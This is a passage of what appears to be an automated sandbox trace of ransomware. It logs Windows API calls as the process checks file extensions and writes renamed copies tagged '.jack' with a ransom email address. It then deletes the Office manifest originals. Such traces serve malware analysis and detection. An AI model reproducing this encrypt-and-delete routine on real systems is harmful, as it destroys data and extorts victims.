(lpString1=".7z", lpString2="gif") returned -1 [0201.831] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif") returned 56 [0201.831] lstrlenW (lpString=".dbf") returned 4 [0201.831] lstrcmpiW (lpString1=".dbf", lpString2=".gif") returned -1 [0201.831] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif") returned 56 [0201.831] lstrlenW (lpString=".1cd") returned 4 [0201.831] lstrcmpiW (lpString1=".1cd", lpString2=".gif") returned -1 [0201.831] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\splash.gif") returned 56 [0201.831] lstrlenW (lpString=".jpg") returned 4 [0201.831] lstrcmpiW (lpString1=".jpg", lpString2=".gif") returned 1 [0201.831] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0201.831] lstrlenW (lpString="AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 53 [0201.831] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0201.831] GetFileSizeEx (in: hFile=0x41c, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=1533) returned 1 [0201.831] CloseHandle (hObject=0x41c) returned 1 [0201.831] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0409-1000-0000000ff1ce.xml")) returned 0x220 [0201.831] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0409-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0201.832] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0409-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0201.832] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.832] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.832] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0409-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0201.832] GetLastError () returned 0x0 [0201.832] ReadFile (in: hFile=0x41c, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x5fd, lpOverlapped=0x0) returned 1 [0203.028] WriteFile (in: hFile=0x410, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0x600, lpOverlapped=0x0) returned 1 [0203.029] ReadFile (in: hFile=0x41c, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x0, lpOverlapped=0x0) returned 1 [0203.029] WriteFile (in: hFile=0x410, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0x13e, lpOverlapped=0x0) returned 1 [0203.029] SetEndOfFile (hFile=0x410) returned 1 [0203.029] CloseHandle (hObject=0x410) returned 1 [0203.030] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0203.030] SetEndOfFile (hFile=0x41c) returned 1 [0203.031] CloseHandle (hObject=0x41c) returned 1 [0203.031] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0203.032] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0015-0409-1000-0000000ff1ce.xml")) returned 1 [0203.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 104 [0203.032] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 104 [0203.032] lstrlenW (lpString=".doc") returned 4 [0203.032] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0203.032] lstrlenW (lpString=".docx") returned 5 [0203.032] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0203.032] lstrlenW (lpString=".pdf") returned 4 [0203.032] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0203.032] lstrlenW (lpString=".xls") returned 4 [0203.032] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0203.032] lstrlenW (lpString=".xlsx") returned 5 [0203.032] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0203.033] lstrlenW (lpString=".ppt") returned 4 [0203.033] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0203.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 104 [0203.033] lstrlenW (lpString=".zip") returned 4 [0203.033] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0203.033] lstrlenW (lpString=".rar") returned 4 [0203.033] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0203.033] lstrlenW (lpString=".bz2") returned 4 [0203.033] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0203.033] lstrlenW (lpString=".7z") returned 3 [0203.033] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0203.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 104 [0203.033] lstrlenW (lpString=".dbf") returned 4 [0203.033] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0203.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 104 [0203.033] lstrlenW (lpString=".1cd") returned 4 [0203.033] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0203.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 104 [0203.033] lstrlenW (lpString=".jpg") returned 4 [0203.033] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0203.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 104 [0203.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 104 [0203.033] lstrlenW (lpString=".doc") returned 4 [0203.033] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0203.033] lstrlenW (lpString=".docx") returned 5 [0203.033] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0203.033] lstrlenW (lpString=".pdf") returned 4 [0203.033] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0203.033] lstrlenW (lpString=".xls") returned 4 [0203.034] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0203.034] lstrlenW (lpString=".xlsx") returned 5 [0203.034] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0203.034] lstrlenW (lpString=".ppt") returned 4 [0203.034] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0203.034] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 104 [0203.034] lstrlenW (lpString=".zip") returned 4 [0203.034] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0203.034] lstrlenW (lpString=".rar") returned 4 [0203.034] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0203.034] lstrlenW (lpString=".bz2") returned 4 [0203.034] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0203.034] lstrlenW (lpString=".7z") returned 3 [0203.034] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0203.034] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 104 [0203.034] lstrlenW (lpString=".dbf") returned 4 [0203.034] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0203.034] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 104 [0203.034] lstrlenW (lpString=".1cd") returned 4 [0203.034] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0203.034] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0015-0409-1000-0000000FF1CE.xml") returned 104 [0203.034] lstrlenW (lpString=".jpg") returned 4 [0203.034] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0203.034] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0203.035] lstrlenW (lpString="AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 53 [0203.035] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0203.992] GetFileSizeEx (in: hFile=0x41c, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=800867) returned 1 [0203.992] CloseHandle (hObject=0x41c) returned 1 [0203.992] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0000-1000-0000000ff1ce.xml")) returned 0x220 [0203.992] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0000-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0203.992] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0203.992] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0203.992] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0203.992] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0000-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0203.993] GetLastError () returned 0x0 [0203.993] ReadFile (in: hFile=0x41c, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0xc3863, lpOverlapped=0x0) returned 1 [0204.189] WriteFile (in: hFile=0x410, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xc3870, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xc3870, lpOverlapped=0x0) returned 1 [0204.201] ReadFile (in: hFile=0x41c, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x0, lpOverlapped=0x0) returned 1 [0204.201] WriteFile (in: hFile=0x410, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0x13e, lpOverlapped=0x0) returned 1 [0204.201] SetEndOfFile (hFile=0x410) returned 1 [0204.282] CloseHandle (hObject=0x410) returned 1 [0204.294] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0204.294] SetEndOfFile (hFile=0x41c) returned 1 [0204.352] CloseHandle (hObject=0x41c) returned 1 [0204.352] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0204.353] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0016-0000-1000-0000000ff1ce.xml")) returned 1 [0204.353] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 104 [0204.353] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 104 [0204.353] lstrlenW (lpString=".doc") returned 4 [0204.353] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0204.353] lstrlenW (lpString=".docx") returned 5 [0204.353] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0204.353] lstrlenW (lpString=".pdf") returned 4 [0204.353] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0204.353] lstrlenW (lpString=".xls") returned 4 [0204.353] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0204.353] lstrlenW (lpString=".xlsx") returned 5 [0204.353] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0204.353] lstrlenW (lpString=".ppt") returned 4 [0204.353] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0204.354] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 104 [0204.354] lstrlenW (lpString=".zip") returned 4 [0204.354] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0204.354] lstrlenW (lpString=".rar") returned 4 [0204.354] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0204.354] lstrlenW (lpString=".bz2") returned 4 [0204.354] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0204.354] lstrlenW (lpString=".7z") returned 3 [0204.354] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0204.354] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 104 [0204.354] lstrlenW (lpString=".dbf") returned 4 [0204.354] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0204.354] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 104 [0204.354] lstrlenW (lpString=".1cd") returned 4 [0204.354] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0204.354] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 104 [0204.354] lstrlenW (lpString=".jpg") returned 4 [0204.354] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0204.354] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 104 [0204.354] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 104 [0204.354] lstrlenW (lpString=".doc") returned 4 [0204.354] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0204.354] lstrlenW (lpString=".docx") returned 5 [0204.354] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0204.354] lstrlenW (lpString=".pdf") returned 4 [0204.354] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0204.354] lstrlenW (lpString=".xls") returned 4 [0204.354] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0204.354] lstrlenW (lpString=".xlsx") returned 5 [0204.354] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0204.354] lstrlenW (lpString=".ppt") returned 4 [0204.354] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0204.354] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 104 [0204.354] lstrlenW (lpString=".zip") returned 4 [0204.354] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0204.354] lstrlenW (lpString=".rar") returned 4 [0204.355] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0204.355] lstrlenW (lpString=".bz2") returned 4 [0204.355] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0204.355] lstrlenW (lpString=".7z") returned 3 [0204.355] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0204.355] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 104 [0204.355] lstrlenW (lpString=".dbf") returned 4 [0204.355] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0204.355] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 104 [0204.355] lstrlenW (lpString=".1cd") returned 4 [0204.355] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0204.355] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml") returned 104 [0204.355] lstrlenW (lpString=".jpg") returned 4 [0204.355] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0204.355] lstrcmpiW (lpString1=".xml", lpString2=".jack") returned 1 [0204.355] lstrlenW (lpString="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 53 [0204.355] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0204.355] GetFileSizeEx (in: hFile=0x41c, lpFileSize=0x391ff14 | out: lpFileSize=0x391ff14*=1124942) returned 1 [0204.355] CloseHandle (hObject=0x41c) returned 1 [0204.355] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0000-1000-0000000ff1ce.xml")) returned 0x220 [0204.356] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0000-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0204.356] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0000-1000-0000000ff1ce.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x41c [0204.356] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0204.356] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0204.356] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0000-1000-0000000ff1ce.xml.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x418 [0204.356] GetLastError () returned 0x0 [0204.356] ReadFile (in: hFile=0x41c, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0xffff0, lpOverlapped=0x0) returned 1 [0204.630] WriteFile (in: hFile=0x418, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0xffff0, lpOverlapped=0x0) returned 1 [0204.649] ReadFile (in: hFile=0x41c, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x12a5e, lpOverlapped=0x0) returned 1 [0205.154] WriteFile (in: hFile=0x418, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0x12a60, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0x12a60, lpOverlapped=0x0) returned 1 [0205.158] ReadFile (in: hFile=0x41c, lpBuffer=0x444e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x391fecc, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesRead=0x391fecc*=0x0, lpOverlapped=0x0) returned 1 [0205.158] WriteFile (in: hFile=0x418, lpBuffer=0x444e020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x391fc94, lpOverlapped=0x0 | out: lpBuffer=0x444e020*, lpNumberOfBytesWritten=0x391fc94*=0x13e, lpOverlapped=0x0) returned 1 [0205.158] SetEndOfFile (hFile=0x418) returned 1 [0205.218] CloseHandle (hObject=0x418) returned 1 [0205.250] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x391fec0 | out: lpNewFilePointer=0x0) returned 1 [0205.250] SetEndOfFile (hFile=0x41c) returned 1 [0205.252] CloseHandle (hObject=0x41c) returned 1 [0205.527] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x220) returned 1 [0205.527] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0000-1000-0000000ff1ce.xml")) returned 1 [0205.528] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 104 [0205.528] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 104 [0205.528] lstrlenW (lpString=".doc") returned 4 [0205.528] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0205.528] lstrlenW (lpString=".docx") returned 5 [0205.528] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0205.528] lstrlenW (lpString=".pdf") returned 4 [0205.528] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0205.528] lstrlenW (lpString=".xls") returned 4 [0205.528] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0205.528] lstrlenW (lpString=".xlsx") returned 5 [0205.528] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0205.528] lstrlenW (lpString=".ppt") returned 4 [0205.528] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0205.528] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 104 [0205.528] lstrlenW (lpString=".zip") returned 4 [0205.528] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0205.528] lstrlenW (lpString=".rar") returned 4 [0205.528] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0205.528] lstrlenW (lpString=".bz2") returned 4 [0205.528] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0205.528] lstrlenW (lpString=".7z") returned 3 [0205.528] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0205.528] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 104 [0205.528] lstrlenW (lpString=".dbf") returned 4 [0205.658] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0205.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 104 [0205.658] lstrlenW (lpString=".1cd") returned 4 [0205.658] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0205.658] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 104 [0205.658] lstrlenW (lpString=".jpg") returned 4 [0205.658] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 